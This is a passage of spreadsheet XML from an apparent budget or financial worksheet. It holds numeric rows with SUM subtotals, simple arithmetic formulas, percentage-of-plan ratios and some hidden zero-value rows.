    </row>
    <row r="633" spans="1:7" ht="17.25" customHeight="1">
      <c r="A633" s="128" t="s">
        <v>819</v>
      </c>
      <c r="B633" s="100"/>
      <c r="C633" s="100"/>
      <c r="D633" s="100">
        <v>0</v>
      </c>
      <c r="E633" s="173"/>
      <c r="F633" s="174"/>
      <c r="G633" s="172"/>
    </row>
    <row r="634" spans="1:7" ht="17.25" customHeight="1">
      <c r="A634" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B634" s="100"/>
      <c r="C634" s="100"/>
      <c r="D634" s="100">
        <v>150</v>
      </c>
      <c r="E634" s="173">
        <v>150</v>
      </c>
      <c r="F634" s="174"/>
      <c r="G634" s="172"/>
    </row>
    <row r="635" spans="1:7" ht="17.25" customHeight="1">
      <c r="A635" s="128" t="s">
        <v>820</v>
      </c>
      <c r="B635" s="100"/>
      <c r="C635" s="100"/>
      <c r="D635" s="100">
        <v>0</v>
      </c>
      <c r="E635" s="173"/>
      <c r="F635" s="174"/>
      <c r="G635" s="172"/>
    </row>
    <row r="636" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A636" s="128" t="s">
        <v>821</v>
      </c>
      <c r="B636" s="100">
        <f>B637+B638</f>
        <v>0</v>
      </c>
      <c r="C636" s="100">
        <f>C637+C638</f>
        <v>0</v>
      </c>
      <c r="D636" s="100">
        <f>D637+D638</f>
        <v>0</v>
      </c>
      <c r="E636" s="173">
        <f>E637+E638</f>
        <v>0</v>
      </c>
      <c r="F636" s="174"/>
      <c r="G636" s="172"/>
    </row>
    <row r="637" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A637" s="128" t="s">
        <v>822</v>
      </c>
      <c r="B637" s="100"/>
      <c r="C637" s="100"/>
      <c r="D637" s="100">
        <v>0</v>
      </c>
      <c r="E637" s="173"/>
      <c r="F637" s="174"/>
      <c r="G637" s="172"/>
    </row>
    <row r="638" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A638" s="128" t="s">
        <v>823</v>
      </c>
      <c r="B638" s="100"/>
      <c r="C638" s="100"/>
      <c r="D638" s="100">
        <v>0</v>
      </c>
      <c r="E638" s="173"/>
      <c r="F638" s="174"/>
      <c r="G638" s="172"/>
    </row>
    <row r="639" spans="1:7" ht="17.25" customHeight="1">
      <c r="A639" s="128" t="s">
        <v>824</v>
      </c>
      <c r="B639" s="100">
        <v>221</v>
      </c>
      <c r="C639" s="100"/>
      <c r="D639" s="100">
        <f>3902-3867</f>
        <v>35</v>
      </c>
      <c r="E639" s="173">
        <f>3902-3867</f>
        <v>35</v>
      </c>
      <c r="F639" s="174"/>
      <c r="G639" s="172"/>
    </row>
    <row r="640" spans="1:7" ht="17.25" customHeight="1">
      <c r="A640" s="128" t="s">
        <v>825</v>
      </c>
      <c r="B640" s="173">
        <f>SUM(B641,B646,B660,B664,B676,B679,B683,B688,B692,B696,B699,B708,B710)</f>
        <v>185800</v>
      </c>
      <c r="C640" s="173">
        <f>SUM(C641,C646,C660,C664,C676,C679,C683,C688,C692,C696,C699,C708,C710)</f>
        <v>31568</v>
      </c>
      <c r="D640" s="173">
        <f>SUM(D641,D646,D660,D664,D676,D679,D683,D688,D692,D696,D699,D708,D710)</f>
        <v>215257</v>
      </c>
      <c r="E640" s="173">
        <f>SUM(E641,E646,E660,E664,E676,E679,E683,E688,E692,E696,E699,E708,E710)</f>
        <v>32555</v>
      </c>
      <c r="F640" s="174">
        <f aca="true" t="shared" si="42" ref="F640:F643">E640/C640*100</f>
        <v>103.12658388241256</v>
      </c>
      <c r="G640" s="172"/>
    </row>
    <row r="641" spans="1:7" ht="17.25" customHeight="1">
      <c r="A641" s="128" t="s">
        <v>826</v>
      </c>
      <c r="B641" s="100">
        <f>SUM(B642:B645)</f>
        <v>980</v>
      </c>
      <c r="C641" s="100">
        <f>SUM(C642:C645)</f>
        <v>980</v>
      </c>
      <c r="D641" s="100">
        <f>SUM(D642:D645)</f>
        <v>908</v>
      </c>
      <c r="E641" s="173">
        <f>SUM(E642:E645)</f>
        <v>908</v>
      </c>
      <c r="F641" s="174">
        <f t="shared" si="42"/>
        <v>92.65306122448979</v>
      </c>
      <c r="G641" s="172"/>
    </row>
    <row r="642" spans="1:7" ht="17.25" customHeight="1">
      <c r="A642" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B642" s="100">
        <v>962</v>
      </c>
      <c r="C642" s="100">
        <v>962</v>
      </c>
      <c r="D642" s="100">
        <v>862</v>
      </c>
      <c r="E642" s="173">
        <v>862</v>
      </c>
      <c r="F642" s="174">
        <f t="shared" si="42"/>
        <v>89.6049896049896</v>
      </c>
      <c r="G642" s="172"/>
    </row>
    <row r="643" spans="1:7" ht="17.25" customHeight="1">
      <c r="A643" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B643" s="100">
        <v>18</v>
      </c>
      <c r="C643" s="100">
        <v>18</v>
      </c>
      <c r="D643" s="100">
        <v>26</v>
      </c>
      <c r="E643" s="173">
        <v>26</v>
      </c>
      <c r="F643" s="174">
        <f t="shared" si="42"/>
        <v>144.44444444444443</v>
      </c>
      <c r="G643" s="172"/>
    </row>
    <row r="644" spans="1:7" ht="17.25" customHeight="1">
      <c r="A644" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B644" s="100">
        <v>0</v>
      </c>
      <c r="C644" s="100"/>
      <c r="D644" s="100">
        <v>0</v>
      </c>
      <c r="E644" s="173"/>
      <c r="F644" s="174"/>
      <c r="G644" s="172"/>
    </row>
    <row r="645" spans="1:7" ht="17.25" customHeight="1">
      <c r="A645" s="128" t="s">
        <v>827</v>
      </c>
      <c r="B645" s="100">
        <v>0</v>
      </c>
      <c r="C645" s="100"/>
      <c r="D645" s="100">
        <v>20</v>
      </c>
      <c r="E645" s="173">
        <v>20</v>
      </c>
      <c r="F645" s="174"/>
      <c r="G645" s="172"/>
    </row>
    <row r="646" spans="1:7" ht="17.25" customHeight="1">
      <c r="A646" s="128" t="s">
        <v>828</v>
      </c>
      <c r="B646" s="100">
        <f>SUM(B647:B659)</f>
        <v>8414</v>
      </c>
      <c r="C646" s="100">
        <f>SUM(C647:C659)</f>
        <v>8353</v>
      </c>
      <c r="D646" s="100">
        <f>SUM(D647:D659)</f>
        <v>8353</v>
      </c>
      <c r="E646" s="173">
        <f>SUM(E647:E659)</f>
        <v>8353</v>
      </c>
      <c r="F646" s="174">
        <f>E646/C646*100</f>
        <v>100</v>
      </c>
      <c r="G646" s="172"/>
    </row>
    <row r="647" spans="1:7" ht="17.25" customHeight="1">
      <c r="A647" s="128" t="s">
        <v>829</v>
      </c>
      <c r="B647" s="100">
        <v>0</v>
      </c>
      <c r="C647" s="100"/>
      <c r="D647" s="100">
        <v>0</v>
      </c>
      <c r="E647" s="173"/>
      <c r="F647" s="174"/>
      <c r="G647" s="172"/>
    </row>
    <row r="648" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A648" s="128" t="s">
        <v>830</v>
      </c>
      <c r="B648" s="100">
        <v>0</v>
      </c>
      <c r="C648" s="100"/>
      <c r="D648" s="100">
        <v>0</v>
      </c>
      <c r="E648" s="173"/>
      <c r="F648" s="174"/>
      <c r="G648" s="172"/>
    </row>
    <row r="649" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A649" s="128" t="s">
        <v>831</v>
      </c>
      <c r="B649" s="100">
        <v>0</v>
      </c>
      <c r="C649" s="100"/>
      <c r="D649" s="100">
        <v>0</v>
      </c>
      <c r="E649" s="173"/>
      <c r="F649" s="174"/>
      <c r="G649" s="172"/>
    </row>
    <row r="650" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A650" s="128" t="s">
        <v>832</v>
      </c>
      <c r="B650" s="100">
        <v>0</v>
      </c>
      <c r="C650" s="100"/>
      <c r="D650" s="100">
        <v>0</v>
      </c>
      <c r="E650" s="173"/>
      <c r="F650" s="174"/>
      <c r="G650" s="172"/>
    </row>
    <row r="651" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A651" s="128" t="s">
        <v>833</v>
      </c>
      <c r="B651" s="100">
        <v>0</v>
      </c>
      <c r="C651" s="100"/>
      <c r="D651" s="100">
        <v>0</v>
      </c>
      <c r="E651" s="173"/>
      <c r="F651" s="174"/>
      <c r="G651" s="172"/>
    </row>
    <row r="652" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A652" s="128" t="s">
        <v>834</v>
      </c>
      <c r="B652" s="100">
        <v>0</v>
      </c>
      <c r="C652" s="100"/>
      <c r="D652" s="100">
        <v>0</v>
      </c>
      <c r="E652" s="173"/>
      <c r="F652" s="174"/>
      <c r="G652" s="172"/>
    </row>
    <row r="653" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A653" s="128" t="s">
        <v>835</v>
      </c>
      <c r="B653" s="100">
        <v>0</v>
      </c>
      <c r="C653" s="100"/>
      <c r="D653" s="100">
        <v>0</v>
      </c>
      <c r="E653" s="173"/>
      <c r="F653" s="174"/>
      <c r="G653" s="172"/>
    </row>
    <row r="654" spans="1:7" ht="17.25" customHeight="1">
      <c r="A654" s="128" t="s">
        <v>836</v>
      </c>
      <c r="B654" s="100">
        <v>20</v>
      </c>
      <c r="C654" s="100">
        <v>20</v>
      </c>
      <c r="D654" s="100">
        <v>20</v>
      </c>
      <c r="E654" s="173">
        <v>20</v>
      </c>
      <c r="F654" s="174">
        <f>E654/C654*100</f>
        <v>100</v>
      </c>
      <c r="G654" s="172"/>
    </row>
    <row r="655" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A655" s="128" t="s">
        <v>837</v>
      </c>
      <c r="B655" s="100">
        <v>0</v>
      </c>
      <c r="C655" s="100"/>
      <c r="D655" s="100">
        <v>0</v>
      </c>
      <c r="E655" s="173"/>
      <c r="F655" s="174"/>
      <c r="G655" s="172"/>
    </row>
    <row r="656" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A656" s="128" t="s">
        <v>838</v>
      </c>
      <c r="B656" s="100">
        <v>0</v>
      </c>
      <c r="C656" s="100"/>
      <c r="D656" s="100">
        <v>0</v>
      </c>
      <c r="E656" s="173"/>
      <c r="F656" s="174"/>
      <c r="G656" s="172"/>
    </row>
    <row r="657" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A657" s="128" t="s">
        <v>839</v>
      </c>
      <c r="B657" s="100">
        <v>0</v>
      </c>
      <c r="C657" s="100"/>
      <c r="D657" s="100">
        <v>0</v>
      </c>
      <c r="E657" s="173"/>
      <c r="F657" s="174"/>
      <c r="G657" s="172"/>
    </row>
    <row r="658" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A658" s="128" t="s">
        <v>840</v>
      </c>
      <c r="B658" s="100"/>
      <c r="C658" s="100"/>
      <c r="D658" s="100">
        <v>0</v>
      </c>
      <c r="E658" s="173"/>
      <c r="F658" s="174"/>
      <c r="G658" s="172"/>
    </row>
    <row r="659" spans="1:7" ht="17.25" customHeight="1">
      <c r="A659" s="128" t="s">
        <v>841</v>
      </c>
      <c r="B659" s="100">
        <f>3261+5133</f>
        <v>8394</v>
      </c>
      <c r="C659" s="100">
        <f>3200+5133</f>
        <v>8333</v>
      </c>
      <c r="D659" s="100">
        <v>8333</v>
      </c>
      <c r="E659" s="173">
        <v>8333</v>
      </c>
      <c r="F659" s="174">
        <f>E659/C659*100</f>
        <v>100</v>
      </c>
      <c r="G659" s="172"/>
    </row>
    <row r="660" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A660" s="128" t="s">
        <v>842</v>
      </c>
      <c r="B660" s="100">
        <f>SUM(B661:B663)</f>
        <v>0</v>
      </c>
      <c r="C660" s="100">
        <f>SUM(C661:C663)</f>
        <v>0</v>
      </c>
      <c r="D660" s="100">
        <f>SUM(D661:D663)</f>
        <v>0</v>
      </c>
      <c r="E660" s="173">
        <f>SUM(E661:E663)</f>
        <v>0</v>
      </c>
      <c r="F660" s="174"/>
      <c r="G660" s="172"/>
    </row>
    <row r="661" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A661" s="128" t="s">
        <v>843</v>
      </c>
      <c r="B661" s="100"/>
      <c r="C661" s="100"/>
      <c r="D661" s="100">
        <v>0</v>
      </c>
      <c r="E661" s="173"/>
      <c r="F661" s="174"/>
      <c r="G661" s="172"/>
    </row>
    <row r="662" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A662" s="128" t="s">
        <v>844</v>
      </c>
      <c r="B662" s="100">
        <v>0</v>
      </c>
      <c r="C662" s="100"/>
      <c r="D662" s="100">
        <v>0</v>
      </c>
      <c r="E662" s="173"/>
      <c r="F662" s="174"/>
      <c r="G662" s="172"/>
    </row>
    <row r="663" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A663" s="128" t="s">
        <v>845</v>
      </c>
      <c r="B663" s="100">
        <v>0</v>
      </c>
      <c r="C663" s="100"/>
      <c r="D663" s="100">
        <v>0</v>
      </c>
      <c r="E663" s="173"/>
      <c r="F663" s="174"/>
      <c r="G663" s="172"/>
    </row>
    <row r="664" spans="1:7" ht="17.25" customHeight="1">
      <c r="A664" s="128" t="s">
        <v>846</v>
      </c>
      <c r="B664" s="100">
        <f>SUM(B665:B675)</f>
        <v>4008</v>
      </c>
      <c r="C664" s="100">
        <f>SUM(C665:C675)</f>
        <v>3205</v>
      </c>
      <c r="D664" s="100">
        <f>SUM(D665:D675)</f>
        <v>4272</v>
      </c>
      <c r="E664" s="173">
        <f>SUM(E665:E675)</f>
        <v>3383</v>
      </c>
      <c r="F664" s="174">
        <f aca="true" t="shared" si="43" ref="F664:F670">E664/C664*100</f>
        <v>105.55382215288611</v>
      </c>
      <c r="G664" s="172"/>
    </row>
    <row r="665" spans="1:7" ht="17.25" customHeight="1">
      <c r="A665" s="128" t="s">
        <v>847</v>
      </c>
      <c r="B665" s="100">
        <v>808</v>
      </c>
      <c r="C665" s="100">
        <v>808</v>
      </c>
      <c r="D665" s="100">
        <v>795</v>
      </c>
      <c r="E665" s="173">
        <v>795</v>
      </c>
      <c r="F665" s="174">
        <f t="shared" si="43"/>
        <v>98.39108910891089</v>
      </c>
      <c r="G665" s="172"/>
    </row>
    <row r="666" spans="1:7" ht="17.25" customHeight="1">
      <c r="A666" s="128" t="s">
        <v>848</v>
      </c>
      <c r="B666" s="100">
        <v>319</v>
      </c>
      <c r="C666" s="100">
        <v>319</v>
      </c>
      <c r="D666" s="100">
        <v>314</v>
      </c>
      <c r="E666" s="173">
        <v>314</v>
      </c>
      <c r="F666" s="174">
        <f t="shared" si="43"/>
        <v>98.43260188087774</v>
      </c>
      <c r="G666" s="172"/>
    </row>
    <row r="667" spans="1:7" ht="17.25" customHeight="1">
      <c r="A667" s="128" t="s">
        <v>849</v>
      </c>
      <c r="B667" s="100">
        <v>1451</v>
      </c>
      <c r="C667" s="100">
        <v>1451</v>
      </c>
      <c r="D667" s="100">
        <v>1513</v>
      </c>
      <c r="E667" s="173">
        <v>1513</v>
      </c>
      <c r="F667" s="174">
        <f t="shared" si="43"/>
        <v>104.27291523087526</v>
      </c>
      <c r="G667" s="172"/>
    </row>
    <row r="668" spans="1:7" ht="17.25" customHeight="1">
      <c r="A668" s="128" t="s">
        <v>850</v>
      </c>
      <c r="B668" s="100">
        <v>60</v>
      </c>
      <c r="C668" s="100">
        <v>60</v>
      </c>
      <c r="D668" s="100">
        <v>60</v>
      </c>
      <c r="E668" s="173">
        <v>60</v>
      </c>
      <c r="F668" s="174">
        <f t="shared" si="43"/>
        <v>100</v>
      </c>
      <c r="G668" s="172"/>
    </row>
    <row r="669" spans="1:7" ht="17.25" customHeight="1">
      <c r="A669" s="128" t="s">
        <v>851</v>
      </c>
      <c r="B669" s="100">
        <v>369</v>
      </c>
      <c r="C669" s="100">
        <v>369</v>
      </c>
      <c r="D669" s="100">
        <v>383</v>
      </c>
      <c r="E669" s="173">
        <v>383</v>
      </c>
      <c r="F669" s="174">
        <f t="shared" si="43"/>
        <v>103.7940379403794</v>
      </c>
      <c r="G669" s="172"/>
    </row>
    <row r="670" spans="1:7" ht="17.25" customHeight="1">
      <c r="A670" s="128" t="s">
        <v>852</v>
      </c>
      <c r="B670" s="100">
        <v>28</v>
      </c>
      <c r="C670" s="100">
        <v>28</v>
      </c>
      <c r="D670" s="100">
        <v>28</v>
      </c>
      <c r="E670" s="173">
        <v>28</v>
      </c>
      <c r="F670" s="174">
        <f t="shared" si="43"/>
        <v>100</v>
      </c>
      <c r="G670" s="172"/>
    </row>
    <row r="671" spans="1:7" ht="17.25" customHeight="1">
      <c r="A671" s="128" t="s">
        <v>853</v>
      </c>
      <c r="B671" s="100">
        <v>0</v>
      </c>
      <c r="C671" s="100"/>
      <c r="D671" s="100">
        <v>0</v>
      </c>
      <c r="E671" s="173"/>
      <c r="F671" s="174"/>
      <c r="G671" s="172"/>
    </row>
    <row r="672" spans="1:7" ht="17.25" customHeight="1">
      <c r="A672" s="128" t="s">
        <v>854</v>
      </c>
      <c r="B672" s="100">
        <f>310-150</f>
        <v>160</v>
      </c>
      <c r="C672" s="100">
        <f>310-150</f>
        <v>160</v>
      </c>
      <c r="D672" s="100">
        <v>150</v>
      </c>
      <c r="E672" s="173">
        <v>150</v>
      </c>
      <c r="F672" s="174">
        <f aca="true" t="shared" si="44" ref="F672:F679">E672/C672*100</f>
        <v>93.75</v>
      </c>
      <c r="G672" s="172"/>
    </row>
    <row r="673" spans="1:7" ht="17.25" customHeight="1">
      <c r="A673" s="128" t="s">
        <v>855</v>
      </c>
      <c r="B673" s="100">
        <v>813</v>
      </c>
      <c r="C673" s="100">
        <v>10</v>
      </c>
      <c r="D673" s="100">
        <v>939</v>
      </c>
      <c r="E673" s="173">
        <v>50</v>
      </c>
      <c r="F673" s="174">
        <f t="shared" si="44"/>
        <v>500</v>
      </c>
      <c r="G673" s="172"/>
    </row>
    <row r="674" spans="1:7" ht="17.25" customHeight="1">
      <c r="A674" s="128" t="s">
        <v>856</v>
      </c>
      <c r="B674" s="100">
        <v>0</v>
      </c>
      <c r="C674" s="100"/>
      <c r="D674" s="100">
        <v>0</v>
      </c>
      <c r="E674" s="173"/>
      <c r="F674" s="174"/>
      <c r="G674" s="172"/>
    </row>
    <row r="675" spans="1:7" ht="17.25" customHeight="1">
      <c r="A675" s="128" t="s">
        <v>857</v>
      </c>
      <c r="B675" s="100">
        <v>0</v>
      </c>
      <c r="C675" s="100"/>
      <c r="D675" s="100">
        <v>90</v>
      </c>
      <c r="E675" s="173">
        <v>90</v>
      </c>
      <c r="F675" s="174"/>
      <c r="G675" s="172"/>
    </row>
    <row r="676" spans="1:7" ht="17.25" customHeight="1">
      <c r="A676" s="128" t="s">
        <v>858</v>
      </c>
      <c r="B676" s="100">
        <f>SUM(B677:B678)</f>
        <v>269</v>
      </c>
      <c r="C676" s="100">
        <f>SUM(C677:C678)</f>
        <v>269</v>
      </c>
      <c r="D676" s="100">
        <f>SUM(D677:D678)</f>
        <v>264</v>
      </c>
      <c r="E676" s="173">
        <f>SUM(E677:E678)</f>
        <v>264</v>
      </c>
      <c r="F676" s="174">
        <f t="shared" si="44"/>
        <v>98.14126394052045</v>
      </c>
      <c r="G676" s="172"/>
    </row>
    <row r="677" spans="1:7" ht="17.25" customHeight="1">
      <c r="A677" s="128" t="s">
        <v>859</v>
      </c>
      <c r="B677" s="100">
        <v>220</v>
      </c>
      <c r="C677" s="100">
        <v>220</v>
      </c>
      <c r="D677" s="100">
        <v>210</v>
      </c>
      <c r="E677" s="173">
        <v>210</v>
      </c>
      <c r="F677" s="174">
        <f t="shared" si="44"/>
        <v>95.45454545454545</v>
      </c>
      <c r="G677" s="172"/>
    </row>
    <row r="678" spans="1:7" ht="17.25" customHeight="1">
      <c r="A678" s="128" t="s">
        <v>860</v>
      </c>
      <c r="B678" s="100">
        <v>49</v>
      </c>
      <c r="C678" s="100">
        <v>49</v>
      </c>
      <c r="D678" s="100">
        <v>54</v>
      </c>
      <c r="E678" s="173">
        <v>54</v>
      </c>
      <c r="F678" s="174">
        <f t="shared" si="44"/>
        <v>110.20408163265304</v>
      </c>
      <c r="G678" s="172"/>
    </row>
    <row r="679" spans="1:7" ht="17.25" customHeight="1">
      <c r="A679" s="128" t="s">
        <v>861</v>
      </c>
      <c r="B679" s="100">
        <f>SUM(B680:B682)</f>
        <v>2843</v>
      </c>
      <c r="C679" s="100">
        <f>SUM(C680:C682)</f>
        <v>2843</v>
      </c>
      <c r="D679" s="100">
        <f>SUM(D680:D682)</f>
        <v>2843</v>
      </c>
      <c r="E679" s="173">
        <f>SUM(E680:E682)</f>
        <v>2843</v>
      </c>
      <c r="F679" s="174">
        <f t="shared" si="44"/>
        <v>100</v>
      </c>
      <c r="G679" s="172"/>
    </row>
    <row r="680" spans="1:7" ht="17.25" customHeight="1">
      <c r="A680" s="128" t="s">
        <v>862</v>
      </c>
      <c r="B680" s="100">
        <v>0</v>
      </c>
      <c r="C680" s="100"/>
      <c r="D680" s="100">
        <v>0</v>
      </c>
      <c r="E680" s="173"/>
      <c r="F680" s="174"/>
      <c r="G680" s="172"/>
    </row>
    <row r="681" spans="1:7" ht="17.25" customHeight="1">
      <c r="A681" s="128" t="s">
        <v>863</v>
      </c>
      <c r="B681" s="100">
        <v>0</v>
      </c>
      <c r="C681" s="100"/>
      <c r="D681" s="100">
        <v>0</v>
      </c>
      <c r="E681" s="173"/>
      <c r="F681" s="174"/>
      <c r="G681" s="172"/>
    </row>
    <row r="682" spans="1:7" ht="17.25" customHeight="1">
      <c r="A682" s="128" t="s">
        <v>864</v>
      </c>
      <c r="B682" s="100">
        <v>2843</v>
      </c>
      <c r="C682" s="100">
        <v>2843</v>
      </c>
      <c r="D682" s="100">
        <v>2843</v>
      </c>
      <c r="E682" s="173">
        <v>2843</v>
      </c>
      <c r="F682" s="174">
        <f aca="true" t="shared" si="45" ref="F682:F690">E682/C682*100</f>
        <v>100</v>
      </c>
      <c r="G682" s="172"/>
    </row>
    <row r="683" spans="1:7" ht="17.25" customHeight="1">
      <c r="A683" s="128" t="s">
        <v>865</v>
      </c>
      <c r="B683" s="100">
        <f>SUM(B684:B687)</f>
        <v>8219</v>
      </c>
      <c r="C683" s="100">
        <f>SUM(C684:C687)</f>
        <v>8219</v>
      </c>
      <c r="D683" s="100">
        <f>SUM(D684:D687)</f>
        <v>8344</v>
      </c>
      <c r="E683" s="173">
        <f>SUM(E684:E687)</f>
        <v>8344</v>
      </c>
      <c r="F683" s="174">
        <f t="shared" si="45"/>
        <v>101.5208662854362</v>
      </c>
      <c r="G683" s="172"/>
    </row>
    <row r="684" spans="1:7" ht="17.25" customHeight="1">
      <c r="A684" s="128" t="s">
        <v>866</v>
      </c>
      <c r="B684" s="100">
        <v>3221</v>
      </c>
      <c r="C684" s="100">
        <v>3221</v>
      </c>
      <c r="D684" s="100">
        <f>3135+300</f>
        <v>3435</v>
      </c>
      <c r="E684" s="173">
        <f>3135+300</f>
        <v>3435</v>
      </c>
      <c r="F684" s="174">
        <f t="shared" si="45"/>
        <v>106.6438994101211</v>
      </c>
      <c r="G684" s="172"/>
    </row>
    <row r="685" spans="1:7" ht="17.25" customHeight="1">
      <c r="A685" s="128" t="s">
        <v>867</v>
      </c>
      <c r="B685" s="100">
        <v>2898</v>
      </c>
      <c r="C685" s="100">
        <v>2898</v>
      </c>
      <c r="D685" s="100">
        <f>2709+200</f>
        <v>2909</v>
      </c>
      <c r="E685" s="173">
        <f>2709+200</f>
        <v>2909</v>
      </c>
      <c r="F685" s="174">
        <f t="shared" si="45"/>
        <v>100.37957211870254</v>
      </c>
      <c r="G685" s="172"/>
    </row>
    <row r="686" spans="1:7" ht="17.25" customHeight="1">
      <c r="A686" s="128" t="s">
        <v>868</v>
      </c>
      <c r="B686" s="100">
        <v>2000</v>
      </c>
      <c r="C686" s="100">
        <v>2000</v>
      </c>
      <c r="D686" s="100">
        <v>2000</v>
      </c>
      <c r="E686" s="173">
        <v>2000</v>
      </c>
      <c r="F686" s="174">
        <f t="shared" si="45"/>
        <v>100</v>
      </c>
      <c r="G686" s="172"/>
    </row>
    <row r="687" spans="1:7" ht="17.25" customHeight="1">
      <c r="A687" s="128" t="s">
        <v>869</v>
      </c>
      <c r="B687" s="100">
        <v>100</v>
      </c>
      <c r="C687" s="100">
        <v>100</v>
      </c>
      <c r="D687" s="100">
        <v>0</v>
      </c>
      <c r="E687" s="173"/>
      <c r="F687" s="174">
        <f t="shared" si="45"/>
        <v>0</v>
      </c>
      <c r="G687" s="172"/>
    </row>
    <row r="688" spans="1:7" ht="17.25" customHeight="1">
      <c r="A688" s="128" t="s">
        <v>870</v>
      </c>
      <c r="B688" s="100">
        <f>SUM(B689:B691)</f>
        <v>159878</v>
      </c>
      <c r="C688" s="100">
        <f>SUM(C689:C691)</f>
        <v>6530</v>
      </c>
      <c r="D688" s="100">
        <f>SUM(D689:D691)</f>
        <v>189035</v>
      </c>
      <c r="E688" s="173">
        <f>SUM(E689:E691)</f>
        <v>7222</v>
      </c>
      <c r="F688" s="174">
        <f t="shared" si="45"/>
        <v>110.59724349157733</v>
      </c>
      <c r="G688" s="172"/>
    </row>
    <row r="689" spans="1:7" ht="17.25" customHeight="1">
      <c r="A689" s="128" t="s">
        <v>871</v>
      </c>
      <c r="B689" s="100">
        <v>0</v>
      </c>
      <c r="C689" s="100"/>
      <c r="D689" s="100">
        <v>0</v>
      </c>
      <c r="E689" s="173"/>
      <c r="F689" s="174"/>
      <c r="G689" s="172"/>
    </row>
    <row r="690" spans="1:7" ht="17.25" customHeight="1">
      <c r="A690" s="128" t="s">
        <v>872</v>
      </c>
      <c r="B690" s="100">
        <f>7030-500+153348</f>
        <v>159878</v>
      </c>
      <c r="C690" s="100">
        <f>7030-500</f>
        <v>6530</v>
      </c>
      <c r="D690" s="100">
        <f>189035</f>
        <v>189035</v>
      </c>
      <c r="E690" s="173">
        <f>189035-181813</f>
        <v>7222</v>
      </c>
      <c r="F690" s="174">
        <f t="shared" si="45"/>
        <v>110.59724349157733</v>
      </c>
      <c r="G690" s="172"/>
    </row>
    <row r="691" spans="1:7" ht="17.25" customHeight="1">
      <c r="A691" s="128" t="s">
        <v>873</v>
      </c>
      <c r="B691" s="100">
        <v>0</v>
      </c>
      <c r="C691" s="100"/>
      <c r="D691" s="100">
        <v>0</v>
      </c>
      <c r="E691" s="173"/>
      <c r="F691" s="174"/>
      <c r="G691" s="172"/>
    </row>
    <row r="692" spans="1:7" ht="17.25" customHeight="1">
      <c r="A692" s="128" t="s">
        <v>874</v>
      </c>
      <c r="B692" s="100">
        <f>SUM(B693:B695)</f>
        <v>300</v>
      </c>
      <c r="C692" s="100">
        <f>SUM(C693:C695)</f>
        <v>300</v>
      </c>
      <c r="D692" s="100">
        <f>SUM(D693:D695)</f>
        <v>260</v>
      </c>
      <c r="E692" s="173">
        <f>SUM(E693:E695)</f>
        <v>260</v>
      </c>
      <c r="F692" s="174">
        <f>E692/C692*100</f>
        <v>86.66666666666667</v>
      </c>
      <c r="G692" s="172"/>
    </row>
    <row r="693" spans="1:7" ht="17.25" customHeight="1">
      <c r="A693" s="128" t="s">
        <v>875</v>
      </c>
      <c r="B693" s="100"/>
      <c r="C693" s="100"/>
      <c r="D693" s="100">
        <v>0</v>
      </c>
      <c r="E693" s="173"/>
      <c r="F693" s="174"/>
      <c r="G693" s="172"/>
    </row>
    <row r="694" spans="1:7" ht="17.25" customHeight="1">
      <c r="A694" s="128" t="s">
        <v>876</v>
      </c>
      <c r="B694" s="100">
        <v>0</v>
      </c>
      <c r="C694" s="100"/>
      <c r="D694" s="100">
        <v>0</v>
      </c>
      <c r="E694" s="173"/>
      <c r="F694" s="174"/>
      <c r="G694" s="172"/>
    </row>
    <row r="695" spans="1:7" ht="17.25" customHeight="1">
      <c r="A695" s="128" t="s">
        <v>877</v>
      </c>
      <c r="B695" s="100">
        <v>300</v>
      </c>
      <c r="C695" s="100">
        <v>300</v>
      </c>
      <c r="D695" s="100">
        <v>260</v>
      </c>
      <c r="E695" s="173">
        <v>260</v>
      </c>
      <c r="F695" s="174">
        <f>E695/C695*100</f>
        <v>86.66666666666667</v>
      </c>
      <c r="G695" s="172"/>
    </row>
    <row r="696" spans="1:7" ht="17.25" customHeight="1">
      <c r="A696" s="128" t="s">
        <v>878</v>
      </c>
      <c r="B696" s="100">
        <f>SUM(B697:B698)</f>
        <v>20</v>
      </c>
      <c r="C696" s="100">
        <f>SUM(C697:C698)</f>
        <v>0</v>
      </c>
      <c r="D696" s="100">
        <f>SUM(D697:D698)</f>
        <v>0</v>
      </c>
      <c r="E696" s="173">
        <f>SUM(E697:E698)</f>
        <v>0</v>
      </c>
      <c r="F696" s="174"/>
      <c r="G696" s="172"/>
    </row>
    <row r="697" spans="1:7" ht="17.25" customHeight="1">
      <c r="A697" s="128" t="s">
        <v>879</v>
      </c>
      <c r="B697" s="100">
        <v>20</v>
      </c>
      <c r="C697" s="100"/>
      <c r="D697" s="100">
        <v>0</v>
      </c>
      <c r="E697" s="173"/>
      <c r="F697" s="174"/>
      <c r="G697" s="172"/>
    </row>
    <row r="698" spans="1:7" ht="17.25" customHeight="1">
      <c r="A698" s="128" t="s">
        <v>880</v>
      </c>
      <c r="B698" s="100">
        <v>0</v>
      </c>
      <c r="C698" s="100"/>
      <c r="D698" s="100">
        <v>0</v>
      </c>
      <c r="E698" s="173"/>
      <c r="F698" s="174"/>
      <c r="G698" s="172"/>
    </row>
    <row r="699" spans="1:7" ht="17.25" customHeight="1">
      <c r="A699" s="128" t="s">
        <v>881</v>
      </c>
      <c r="B699" s="100">
        <f>SUM(B700:B707)</f>
        <v>210</v>
      </c>
      <c r="C699" s="100">
